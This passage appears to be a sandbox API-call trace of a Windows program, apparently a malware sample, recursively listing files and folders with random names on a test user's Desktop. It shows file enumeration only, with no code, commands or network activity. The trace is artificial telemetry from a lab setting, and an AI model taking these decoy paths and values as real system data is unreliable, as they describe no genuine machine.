FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9930f530, ftCreationTime.dwHighDateTime=0x1d8b585, ftLastAccessTime.dwLowDateTime=0xeb3762a0, ftLastAccessTime.dwHighDateTime=0x1d8bb21, ftLastWriteTime.dwLowDateTime=0xeb3762a0, ftLastWriteTime.dwHighDateTime=0x1d8bb21, nFileSizeHigh=0x0, nFileSizeLow=0x15789, dwReserved0=0x0, dwReserved1=0x0, cFileName="oHD3Y9.jpg", cAlternateFileName="")) returned 1 [0165.910] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23938f00, ftCreationTime.dwHighDateTime=0x1d94ef4, ftLastAccessTime.dwLowDateTime=0x242c2580, ftLastAccessTime.dwHighDateTime=0x1d94ef4, ftLastWriteTime.dwLowDateTime=0x492fe00, ftLastWriteTime.dwHighDateTime=0x1d94ef0, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="out_4.bin.exe", cAlternateFileName="OUT_4B~1.EXE")) returned 1 [0165.910] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x315ede00, ftCreationTime.dwHighDateTime=0x1d8b5f7, ftLastAccessTime.dwLowDateTime=0x3307e8e0, ftLastAccessTime.dwHighDateTime=0x1d8b9c2, ftLastWriteTime.dwLowDateTime=0x3307e8e0, ftLastWriteTime.dwHighDateTime=0x1d8b9c2, nFileSizeHigh=0x0, nFileSizeLow=0x4c0f, dwReserved0=0x0, dwReserved1=0x0, cFileName="p sQcfqaLUL4KbJT __4.mp3", cAlternateFileName="PSQCFQ~1.MP3")) returned 1 [0165.910] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61b9d7c0, ftCreationTime.dwHighDateTime=0x1d8b747, ftLastAccessTime.dwLowDateTime=0x25175800, ftLastAccessTime.dwHighDateTime=0x1d8b987, ftLastWriteTime.dwLowDateTime=0x25175800, ftLastWriteTime.dwHighDateTime=0x1d8b987, nFileSizeHigh=0x0, nFileSizeLow=0x2b3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="p8mE06ilb_q.png", cAlternateFileName="P8ME06~1.PNG")) returned 1 [0165.911] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa6e42b0, ftCreationTime.dwHighDateTime=0x1d8b555, ftLastAccessTime.dwLowDateTime=0xe9f21ba0, ftLastAccessTime.dwHighDateTime=0x1d8bef6, ftLastWriteTime.dwLowDateTime=0xe9f21ba0, ftLastWriteTime.dwHighDateTime=0x1d8bef6, nFileSizeHigh=0x0, nFileSizeLow=0x2ac5, dwReserved0=0x0, dwReserved1=0x0, cFileName="s8ohLOQq4wxVIuURP30V.mp3", cAlternateFileName="S8OHLO~1.MP3")) returned 1 [0165.911] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5e63bf0, ftCreationTime.dwHighDateTime=0x1d8c072, ftLastAccessTime.dwLowDateTime=0xb8fb3480, ftLastAccessTime.dwHighDateTime=0x1d8c11e, ftLastWriteTime.dwLowDateTime=0xb8fb3480, ftLastWriteTime.dwHighDateTime=0x1d8c11e, nFileSizeHigh=0x0, nFileSizeLow=0x2ed3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tw6RboHV38xltxRe2.mp3", cAlternateFileName="TW6RBO~1.MP3")) returned 1 [0165.911] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x300c3db0, ftCreationTime.dwHighDateTime=0x1d8b1c2, ftLastAccessTime.dwLowDateTime=0xd6b7af20, ftLastAccessTime.dwHighDateTime=0x1d8bee5, ftLastWriteTime.dwLowDateTime=0xd6b7af20, ftLastWriteTime.dwHighDateTime=0x1d8bee5, nFileSizeHigh=0x0, nFileSizeLow=0x71d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZDm2HZN0 RK g6UC1V.flv", cAlternateFileName="ZDM2HZ~1.FLV")) returned 1 [0165.912] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73754d10, ftCreationTime.dwHighDateTime=0x1d8b863, ftLastAccessTime.dwLowDateTime=0x9f524660, ftLastAccessTime.dwHighDateTime=0x1d8c022, ftLastWriteTime.dwLowDateTime=0x9f524660, ftLastWriteTime.dwHighDateTime=0x1d8c022, nFileSizeHigh=0x0, nFileSizeLow=0x278d, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZHH2yPigffKt.m4a", cAlternateFileName="ZHH2YP~1.M4A")) returned 1 [0165.912] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa34a63a0, ftCreationTime.dwHighDateTime=0x1d8b542, ftLastAccessTime.dwLowDateTime=0x3494b290, ftLastAccessTime.dwHighDateTime=0x1d8c095, ftLastWriteTime.dwLowDateTime=0x3494b290, ftLastWriteTime.dwHighDateTime=0x1d8c095, nFileSizeHigh=0x0, nFileSizeLow=0xd58, dwReserved0=0x0, dwReserved1=0x0, cFileName="_uyDWF2R_p-YxX_WKj8k.ots", cAlternateFileName="_UYDWF~1.OTS")) returned 1 [0165.912] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0165.912] FindClose (in: hFindFile=0x5bfe278 | out: hFindFile=0x5bfe278) returned 1 [0165.913] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e304) returned 1 [0165.913] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e564) returned 1 [0165.913] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk")) returned 0x10 [0165.914] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk")) returned 0x10 [0165.914] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x27 [0165.914] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK", nBufferLength=0x27, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK", lpFilePart=0x0) returned 0x26 [0165.914] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e4c8) returned 1 [0165.914] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x27 [0165.914] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK", nBufferLength=0x27, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK", lpFilePart=0x0) returned 0x26 [0165.914] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk\\*"), lpFindFileData=0x5a0e278 | out: lpFindFileData=0x5a0e278*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45eb99b0, ftCreationTime.dwHighDateTime=0x1d8b7ed, ftLastAccessTime.dwLowDateTime=0x8d322560, ftLastAccessTime.dwHighDateTime=0x1d8bf12, ftLastWriteTime.dwLowDateTime=0x8d322560, ftLastWriteTime.dwHighDateTime=0x1d8bf12, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe278 [0165.915] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e4c8) returned 1 [0165.915] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x27 [0165.915] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK", nBufferLength=0x27, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK", lpFilePart=0x0) returned 0x26 [0165.915] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk\\*"), lpFindFileData=0x5a0e278 | out: lpFindFileData=0x5a0e278*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45eb99b0, ftCreationTime.dwHighDateTime=0x1d8b7ed, ftLastAccessTime.dwLowDateTime=0x8d322560, ftLastAccessTime.dwHighDateTime=0x1d8bf12, ftLastWriteTime.dwLowDateTime=0x8d322560, ftLastWriteTime.dwHighDateTime=0x1d8bf12, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe138 [0165.915] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e2cc | out: lpFindFileData=0x5a0e2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45eb99b0, ftCreationTime.dwHighDateTime=0x1d8b7ed, ftLastAccessTime.dwLowDateTime=0x8d322560, ftLastAccessTime.dwHighDateTime=0x1d8bf12, ftLastWriteTime.dwLowDateTime=0x8d322560, ftLastWriteTime.dwHighDateTime=0x1d8bf12, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.915] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e2cc | out: lpFindFileData=0x5a0e2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb5bb2150, ftCreationTime.dwHighDateTime=0x1d8b731, ftLastAccessTime.dwLowDateTime=0x5d214660, ftLastAccessTime.dwHighDateTime=0x1d8c117, ftLastWriteTime.dwLowDateTime=0x5d214660, ftLastWriteTime.dwHighDateTime=0x1d8c117, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="81z5--FCV", cAlternateFileName="81Z5--~1")) returned 1 [0165.916] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e2cc | out: lpFindFileData=0x5a0e2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x22715180, ftCreationTime.dwHighDateTime=0x1d8bcf9, ftLastAccessTime.dwLowDateTime=0x638ca90, ftLastAccessTime.dwHighDateTime=0x1d8be3c, ftLastWriteTime.dwLowDateTime=0x638ca90, ftLastWriteTime.dwHighDateTime=0x1d8be3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AGsMi4sruTUxCDEM", cAlternateFileName="AGSMI4~1")) returned 1 [0165.916] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e2cc | out: lpFindFileData=0x5a0e2cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda4879e0, ftCreationTime.dwHighDateTime=0x1d8b688, ftLastAccessTime.dwLowDateTime=0x1f64d0d0, ftLastAccessTime.dwHighDateTime=0x1d8bab4, ftLastWriteTime.dwLowDateTime=0x1f64d0d0, ftLastWriteTime.dwHighDateTime=0x1d8bab4, nFileSizeHigh=0x0, nFileSizeLow=0x6c06, dwReserved0=0x0, dwReserved1=0x0, cFileName="DdInwVOUuKHqsE.png", cAlternateFileName="DDINWV~1.PNG")) returned 1 [0165.916] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e2cc | out: lpFindFileData=0x5a0e2cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8fe9160, ftCreationTime.dwHighDateTime=0x1d8b611, ftLastAccessTime.dwLowDateTime=0x8cd57d0, ftLastAccessTime.dwHighDateTime=0x1d8b84c, ftLastWriteTime.dwLowDateTime=0x8cd57d0, ftLastWriteTime.dwHighDateTime=0x1d8b84c, nFileSizeHigh=0x0, nFileSizeLow=0xb3f3, dwReserved0=0x0, dwReserved1=0x0, cFileName="n3npesLUr22TVZmq2G.ods", cAlternateFileName="N3NPES~1.ODS")) returned 1 [0165.916] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e2cc | out: lpFindFileData=0x5a0e2cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd700f490, ftCreationTime.dwHighDateTime=0x1d8be1e, ftLastAccessTime.dwLowDateTime=0x2313a80, ftLastAccessTime.dwHighDateTime=0x1d8c0f9, ftLastWriteTime.dwLowDateTime=0x2313a80, ftLastWriteTime.dwHighDateTime=0x1d8c0f9, nFileSizeHigh=0x0, nFileSizeLow=0x18378, dwReserved0=0x0, dwReserved1=0x0, cFileName="Z510-D-hkuRt.pps", cAlternateFileName="Z510-D~1.PPS")) returned 1 [0165.916] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e2cc | out: lpFindFileData=0x5a0e2cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd700f490, ftCreationTime.dwHighDateTime=0x1d8be1e, ftLastAccessTime.dwLowDateTime=0x2313a80, ftLastAccessTime.dwHighDateTime=0x1d8c0f9, ftLastWriteTime.dwLowDateTime=0x2313a80, ftLastWriteTime.dwHighDateTime=0x1d8c0f9, nFileSizeHigh=0x0, nFileSizeLow=0x18378, dwReserved0=0x0, dwReserved1=0x0, cFileName="Z510-D-hkuRt.pps", cAlternateFileName="Z510-D~1.PPS")) returned 0 [0165.916] FindClose (in: hFindFile=0x5bfe278 | out: hFindFile=0x5bfe278) returned 1 [0165.917] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e284) returned 1 [0165.917] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e4e4) returned 1 [0165.917] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e2cc | out: lpFindFileData=0x5a0e2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45eb99b0, ftCreationTime.dwHighDateTime=0x1d8b7ed, ftLastAccessTime.dwLowDateTime=0x8d322560, ftLastAccessTime.dwHighDateTime=0x1d8bf12, ftLastWriteTime.dwLowDateTime=0x8d322560, ftLastWriteTime.dwHighDateTime=0x1d8bf12, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.917] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e2cc | out: lpFindFileData=0x5a0e2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb5bb2150, ftCreationTime.dwHighDateTime=0x1d8b731, ftLastAccessTime.dwLowDateTime=0x5d214660, ftLastAccessTime.dwHighDateTime=0x1d8c117, ftLastWriteTime.dwLowDateTime=0x5d214660, ftLastWriteTime.dwHighDateTime=0x1d8c117, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="81z5--FCV", cAlternateFileName="81Z5--~1")) returned 1 [0165.917] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e2cc | out: lpFindFileData=0x5a0e2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x22715180, ftCreationTime.dwHighDateTime=0x1d8bcf9, ftLastAccessTime.dwLowDateTime=0x638ca90, ftLastAccessTime.dwHighDateTime=0x1d8be3c, ftLastWriteTime.dwLowDateTime=0x638ca90, ftLastWriteTime.dwHighDateTime=0x1d8be3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AGsMi4sruTUxCDEM", cAlternateFileName="AGSMI4~1")) returned 1 [0165.917] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e2cc | out: lpFindFileData=0x5a0e2cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda4879e0, ftCreationTime.dwHighDateTime=0x1d8b688, ftLastAccessTime.dwLowDateTime=0x1f64d0d0, ftLastAccessTime.dwHighDateTime=0x1d8bab4, ftLastWriteTime.dwLowDateTime=0x1f64d0d0, ftLastWriteTime.dwHighDateTime=0x1d8bab4, nFileSizeHigh=0x0, nFileSizeLow=0x6c06, dwReserved0=0x0, dwReserved1=0x0, cFileName="DdInwVOUuKHqsE.png", cAlternateFileName="DDINWV~1.PNG")) returned 1 [0165.917] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e2cc | out: lpFindFileData=0x5a0e2cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8fe9160, ftCreationTime.dwHighDateTime=0x1d8b611, ftLastAccessTime.dwLowDateTime=0x8cd57d0, ftLastAccessTime.dwHighDateTime=0x1d8b84c, ftLastWriteTime.dwLowDateTime=0x8cd57d0, ftLastWriteTime.dwHighDateTime=0x1d8b84c, nFileSizeHigh=0x0, nFileSizeLow=0xb3f3, dwReserved0=0x0, dwReserved1=0x0, cFileName="n3npesLUr22TVZmq2G.ods", cAlternateFileName="N3NPES~1.ODS")) returned 1 [0165.918] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e2cc | out: lpFindFileData=0x5a0e2cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd700f490, ftCreationTime.dwHighDateTime=0x1d8be1e, ftLastAccessTime.dwLowDateTime=0x2313a80, ftLastAccessTime.dwHighDateTime=0x1d8c0f9, ftLastWriteTime.dwLowDateTime=0x2313a80, ftLastWriteTime.dwHighDateTime=0x1d8c0f9, nFileSizeHigh=0x0, nFileSizeLow=0x18378, dwReserved0=0x0, dwReserved1=0x0, cFileName="Z510-D-hkuRt.pps", cAlternateFileName="Z510-D~1.PPS")) returned 1 [0165.918] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e2cc | out: lpFindFileData=0x5a0e2cc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0165.918] FindClose (in: hFindFile=0x5bfe138 | out: hFindFile=0x5bfe138) returned 1 [0165.918] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e284) returned 1 [0165.918] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e4e4) returned 1 [0165.918] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk\\81z5--fcv")) returned 0x10 [0165.918] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk\\81z5--fcv")) returned 0x10 [0165.919] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x31 [0165.919] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV", nBufferLength=0x31, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV", lpFilePart=0x0) returned 0x30 [0165.919] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e448) returned 1 [0165.919] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x31 [0165.919] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV", nBufferLength=0x31, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV", lpFilePart=0x0) returned 0x30 [0165.919] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk\\81z5--fcv\\*"), lpFindFileData=0x5a0e1f8 | out: lpFindFileData=0x5a0e1f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb5bb2150, ftCreationTime.dwHighDateTime=0x1d8b731, ftLastAccessTime.dwLowDateTime=0x5d214660, ftLastAccessTime.dwHighDateTime=0x1d8c117, ftLastWriteTime.dwLowDateTime=0x5d214660, ftLastWriteTime.dwHighDateTime=0x1d8c117, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe138 [0165.920] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e448) returned 1 [0165.920] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x31 [0165.920] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV", nBufferLength=0x31, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV", lpFilePart=0x0) returned 0x30 [0165.920] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk\\81z5--fcv\\*"), lpFindFileData=0x5a0e1f8 | out: lpFindFileData=0x5a0e1f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb5bb2150, ftCreationTime.dwHighDateTime=0x1d8b731, ftLastAccessTime.dwLowDateTime=0x5d214660, ftLastAccessTime.dwHighDateTime=0x1d8c117, ftLastWriteTime.dwLowDateTime=0x5d214660, ftLastWriteTime.dwHighDateTime=0x1d8c117, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe278 [0165.920] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb5bb2150, ftCreationTime.dwHighDateTime=0x1d8b731, ftLastAccessTime.dwLowDateTime=0x5d214660, ftLastAccessTime.dwHighDateTime=0x1d8c117, ftLastWriteTime.dwLowDateTime=0x5d214660, ftLastWriteTime.dwHighDateTime=0x1d8c117, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.920] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7fd6300, ftCreationTime.dwHighDateTime=0x1d8bc7d, ftLastAccessTime.dwLowDateTime=0x86c0ad40, ftLastAccessTime.dwHighDateTime=0x1d8c03a, ftLastWriteTime.dwLowDateTime=0x86c0ad40, ftLastWriteTime.dwHighDateTime=0x1d8c03a, nFileSizeHigh=0x0, nFileSizeLow=0x73d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="AC1n-76cpWFuDg.mp4", cAlternateFileName="AC1N-7~1.MP4")) returned 1 [0165.920] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e2a8590, ftCreationTime.dwHighDateTime=0x1d8b25c, ftLastAccessTime.dwLowDateTime=0x16c1880, ftLastAccessTime.dwHighDateTime=0x1d8b542, ftLastWriteTime.dwLowDateTime=0x16c1880, ftLastWriteTime.dwHighDateTime=0x1d8b542, nFileSizeHigh=0x0, nFileSizeLow=0xfe3d, dwReserved0=0x0, dwReserved1=0x0, cFileName="atgGmH16.gif", cAlternateFileName="")) returned 1 [0165.920] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8138f420, ftCreationTime.dwHighDateTime=0x1d8bc18, ftLastAccessTime.dwLowDateTime=0xb4593810, ftLastAccessTime.dwHighDateTime=0x1d8be1b, ftLastWriteTime.dwLowDateTime=0xb4593810, ftLastWriteTime.dwHighDateTime=0x1d8be1b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BN91lKiFOeJlVa", cAlternateFileName="BN91LK~1")) returned 1 [0165.921] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0165.921] FindClose (in: hFindFile=0x5bfe138 | out: hFindFile=0x5bfe138) returned 1 [0165.921] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e204) returned 1 [0165.921] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e464) returned 1 [0165.921] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb5bb2150, ftCreationTime.dwHighDateTime=0x1d8b731, ftLastAccessTime.dwLowDateTime=0x5d214660, ftLastAccessTime.dwHighDateTime=0x1d8c117, ftLastWriteTime.dwLowDateTime=0x5d214660, ftLastWriteTime.dwHighDateTime=0x1d8c117, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.921] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7fd6300, ftCreationTime.dwHighDateTime=0x1d8bc7d, ftLastAccessTime.dwLowDateTime=0x86c0ad40, ftLastAccessTime.dwHighDateTime=0x1d8c03a, ftLastWriteTime.dwLowDateTime=0x86c0ad40, ftLastWriteTime.dwHighDateTime=0x1d8c03a, nFileSizeHigh=0x0, nFileSizeLow=0x73d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="AC1n-76cpWFuDg.mp4", cAlternateFileName="AC1N-7~1.MP4")) returned 1 [0165.921] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e2a8590, ftCreationTime.dwHighDateTime=0x1d8b25c, ftLastAccessTime.dwLowDateTime=0x16c1880, 